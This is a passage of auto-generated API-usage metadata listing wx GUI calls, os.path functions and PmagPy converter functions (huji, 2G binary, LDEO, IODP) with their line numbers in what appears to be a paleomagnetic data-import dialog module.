"usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1166, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1169, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1184, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1185, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1188, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1188, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1202, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1202, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 1208, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1212, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1212, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 1216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1218, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1218, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1221, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 1221, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1222, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1225, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1227, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1228, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1230, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1231, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1240, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1240, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1277, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1277, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1279, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1281, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1281, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1284, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji.__doc__", "line_number": 1284, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1284, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1284, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1294, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1295, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1295, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1299, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1299, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1302, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1302, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1306, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1306, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1310, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1310, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1313, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1313, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1317, "usage_type": "call"}, {"api_name": 
"dialogs.pmag_widgets", "line_number": 1317, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1321, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1321, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1324, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1324, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1327, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1327, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1330, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1330, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1333, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1333, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1337, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1337, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1339, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1340, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1341, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1342, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1343, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1344, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1345, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1345, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1346, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1349, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1349, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1364, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1371, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1371, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1373, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1376, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1376, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1430, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1430, "usage_type": 
"name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1431, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1431, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1433, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1433, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1437, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1437, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1440, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1440, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1444, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1444, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1444, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1444, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1457, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1457, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1458, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1458, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1462, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1462, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1465, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1465, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1469, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1469, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1473, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1473, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1476, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1476, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1480, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1480, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1484, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1484, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1487, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1487, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1490, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1490, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1493, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1493, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1496, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1496, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1498, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1499, "usage_type": "attribute"}, {"api_name": 
"wx.TOP", "line_number": 1499, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1500, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1501, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1502, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1503, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1504, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1505, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1506, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1507, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1508, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1509, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1512, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1512, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1527, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1534, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1534, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1536, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1539, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1539, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1593, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1593, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1594, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1594, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1596, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1596, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_asc", "line_number": 1600, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1600, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1603, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1603, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1607, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1607, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic._2g_bin", "line_number": 1607, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1607, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1620, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", 
"line_number": 1620, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1621, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1621, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1624, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1624, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1628, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1628, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1635, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1635, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1638, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1638, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1642, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1642, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1646, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1646, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1649, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1649, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1653, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1653, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1657, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1657, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.mass_or_volume_buttons", "line_number": 1660, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1660, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1663, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1663, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1666, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1666, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1667, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1667, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1668, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1669, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1669, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 1670, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1671, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1673, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1675, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1676, "usage_type": "attribute"}, {"api_name": 
"wx.TOP", "line_number": 1676, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1677, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1678, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1679, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1680, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1681, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1682, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1684, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1684, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 1685, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1687, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1687, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1699, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1703, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1706, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1706, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1707, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1707, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1709, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1709, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1710, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1710, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1712, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1712, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1713, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1713, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1715, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1715, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1716, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1716, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1718, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1718, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1719, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1719, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1760, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1760, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1762, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1762, "usage_type": "name"}, 
{"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1767, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.ldeo", "line_number": 1767, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1767, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1779, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1779, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1780, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1780, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.radio_buttons", "line_number": 1784, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1784, "usage_type": "name"}, {"api_name": "wx.HORIZONTAL", "line_number": 1784, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 1785, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_text", "line_number": 1793, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1793, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1796, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1796, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1799, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1799, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1802, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1802, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1806, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1806, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1809, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1809, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1812, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1812, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1816, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1816, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1819, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1823, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1827, 
"usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1835, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1845, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1845, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1857, "usage_type": "call"}, {"api_name": "wx.BusyInfo", "line_number": 1858, "usage_type": "call"}, {"api_name": "wx.SafeYield", "line_number": 1859, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 1862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1862, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1868, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1868, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.iodp_samples_csv", "line_number": 1892, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1892, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1897, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 